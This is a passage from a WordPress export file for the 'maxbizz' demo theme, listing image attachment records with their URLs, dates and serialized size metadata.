;s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>fservice2</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/fservice2/</link>
		<pubDate>Wed, 30 Sep 2020 10:09:57 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/fservice2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1115</wp:post_id>
		<wp:post_date><![CDATA[2020-09-30 10:09:57]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-30 10:09:57]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[fservice2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/fservice2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/fservice2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:745;s:4:"file";s:21:"2020/09/fservice2.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:21:"fservice2-300x116.jpg";s:5:"width";i:300;s:6:"height";i:116;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"fservice2-1024x397.jpg";s:5:"width";i:1024;s:6:"height";i:397;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"fservice2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"fservice2-768x298.jpg";s:5:"width";i:768;s:6:"height";i:298;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"fservice2-1536x596.jpg";s:5:"width";i:1536;s:6:"height";i:596;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"fservice2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"fservice2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>fservice4</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/fservice4/</link>
		<pubDate>Wed, 30 Sep 2020 10:10:01 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/fservice4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1117</wp:post_id>
		<wp:post_date><![CDATA[2020-09-30 10:10:01]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-30 10:10:01]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[fservice4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/fservice4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/fservice4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:745;s:4:"file";s:21:"2020/09/fservice4.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:21:"fservice4-300x116.jpg";s:5:"width";i:300;s:6:"height";i:116;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"fservice4-1024x397.jpg";s:5:"width";i:1024;s:6:"height";i:397;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"fservice4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"fservice4-768x298.jpg";s:5:"width";i:768;s:6:"height";i:298;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"fservice4-1536x596.jpg";s:5:"width";i:1536;s:6:"height";i:596;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"fservice4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"fservice4-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image3-home1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/image3-home1/</link>
		<pubDate>Thu, 01 Oct 2020 09:05:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image3-home1.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1158</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 09:05:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 09:05:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image3-home1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image3-home1.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/image3-home1.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:850;s:6:"height";i:742;s:4:"file";s:24:"2020/10/image3-home1.png";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:24:"image3-home1-300x262.png";s:5:"width";i:300;s:6:"height";i:262;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image3-home1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:12:"medium_large";a:4:{s:4:"file";s:24:"image3-home1-768x670.png";s:5:"width";i:768;s:6:"height";i:670;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image3-home1-600x400.png";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image3-home1-600x600.png";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:24:"image3-home1-100x100.png";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:9:"image/png";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"image3-home1-100x100.png";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg-overlay-home1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/bg-overlay-home1/</link>
		<pubDate>Thu, 01 Oct 2020 09:07:42 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg-overlay-home1.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1159</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 09:07:42]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 09:07:42]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg-overlay-home1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg-overlay-home1.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/bg-overlay-home1.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:992;s:6:"height";i:222;s:4:"file";s:28:"2020/10/bg-overlay-home1.png";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:27:"bg-overlay-home1-300x67.png";s:5:"width";i:300;s:6:"height";i:67;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"bg-overlay-home1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:12:"medium_large";a:4:{s:4:"file";s:28:"bg-overlay-home1-768x172.png";s:5:"width";i:768;s:6:"height";i:172;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:28:"bg-overlay-home1-600x222.png";s:5:"width";i:600;s:6:"height";i:222;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:28:"bg-overlay-home1-600x222.png";s:5:"width";i:600;s:6:"height";i:222;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-home1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/bg2-home1/</link>
		<pubDate>Thu, 01 Oct 2020 10:33:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-home1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1182</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:33:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:33:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-home1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-home1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/bg2-home1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:250;s:4:"file";s:21:"2020/10/bg2-home1.jpg";s:5:"sizes";a:13:{s:6:"medium";a:4:{s:4:"file";s:20:"bg2-home1-300x39.jpg";s:5:"width";i:300;s:6:"height";i:39;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg2-home1-1024x133.jpg";s:5:"width";i:1024;s:6:"height";i:133;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg2-home1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg2-home1-768x100.jpg";s:5:"width";i:768;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg2-home1-1536x200.jpg";s:5:"width";i:1536;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg2-home1-600x250.jpg";s:5:"width";i:600;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg2-home1-600x250.jpg";s:5:"width";i:600;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:21:"woocommerce_thumbnail";a:5:{s:4:"file";s:20:"bg2-home1-300x39.jpg";s:5:"width";i:300;s:6:"height";i:39;s:9:"mime-type";s:10:"image/jpeg";s:9:"uncropped";b:1;}s:18:"woocommerce_single";a:4:{s:4:"file";s:20:"bg2-home1-600x78.jpg";s:5:"width";i:600;s:6:"height";i:78;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:21:"bg2-home1-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"bg2-home1-300x39.jpg";s:5:"width";i:300;s:6:"height";i:39;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"bg2-home1-600x78.jpg";s:5:"width";i:600;s:6:"height";i:78;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"bg2-home1-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-shop</title>
		<link>http://wpdemo.archiwp.com/maxbizz/shop/pheader-shop/</link>
		<pubDate>Thu, 01 Oct 2020 10:58:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-shop.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1207</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:58:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:58:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-shop]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1164</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-shop.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/pheader-shop.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:24:"2020/10/pheader-shop.jpg";s:5:"sizes";a:13:{s:6:"medium";a:4:{s:4:"file";s:23:"pheader-shop-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"pheader-shop-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"pheader-shop-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"pheader-shop-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"pheader-shop-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-shop-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-shop-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:21:"woocommerce_thumbnail";a:5:{s:4:"file";s:23:"pheader-shop-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";s:9:"uncropped";b:1;}s:18:"woocommerce_single";a:4:{s:4:"file";s:24:"pheader-shop-600x125.jpg";s:5:"width";i:600;s:6:"height";i:125;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:24:"pheader-shop-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"pheader-shop-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"pheader-shop-600x125.jpg";s:5:"width";i:600;s:6:"height";i:125;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"pheader-shop-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/project1/</link>
		<pubDate>Fri, 02 Oct 2020 09:09:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1218</wp:post_id>
		<wp:post_date><![CDATA[2020-10-02 09:09:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-02 09:09:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1420;s:6:"height";i:1420;s:4:"file";s:20:"2020/09/project1.jpg";s:5:"sizes";a:14:{s:6:"medium";a:4:{s:4:"file";s:20:"project1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"project1-1024x1024.jpg";s:5:"width";i:1024;s:6:"height";i:1024;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:20:"project1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"project1-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:20:"project1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:20:"project1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:21:"project1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"project1-1200x1200.jpg";s:5:"width";i:1200;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:21:"woocommerce_thumbnail";a:5:{s:4:"file";s:20:"project1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";s:9:"uncropped";b:1;}s:18:"woocommerce_single";a:4:{s:4:"file";s:20:"project1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:20:"project1-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"project1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"project1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"project1-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project2</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/finance-strategy/project2/</link>
		<pubDate>Fri, 02 Oct 2020 09:10:48 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1220</wp:post_id>
		<wp:post_date><![CDATA[2020-10-02 09:10:48]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-02 09:10:48]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>842</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
